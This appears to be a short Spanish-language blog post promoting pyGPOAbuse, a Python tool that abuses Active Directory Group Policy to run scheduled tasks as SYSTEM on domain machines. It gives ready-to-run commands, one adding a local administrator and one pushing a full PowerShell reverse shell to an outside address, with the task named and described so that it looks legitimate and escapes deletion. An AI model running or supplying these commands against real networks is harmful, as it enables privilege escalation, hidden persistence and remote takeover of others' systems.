Abusando de las GPO con pyGPOAbuse

pyGPOAbuse es una herramienta de código abierto escrita en Python que permite abusar de las directivas de grupo (GPO). Es una implementación parcial de SharpGPOAbuse y funciona creando una tarea programada inmediata en el equipo remoto como SYSTEM para las GPO de equipo o como el usuario que inició sesión para las GPO de usuario.

El comportamiento predeterminado agrega un administrador local al equipo.

Uso básico

Añade el usuario john al grupo de administradores locales (Password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Uso avanzado

Ejemplo de shell reversa:

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user
Proyecto: https://github.com/Hackndo/pyGPOAbuse

Comentarios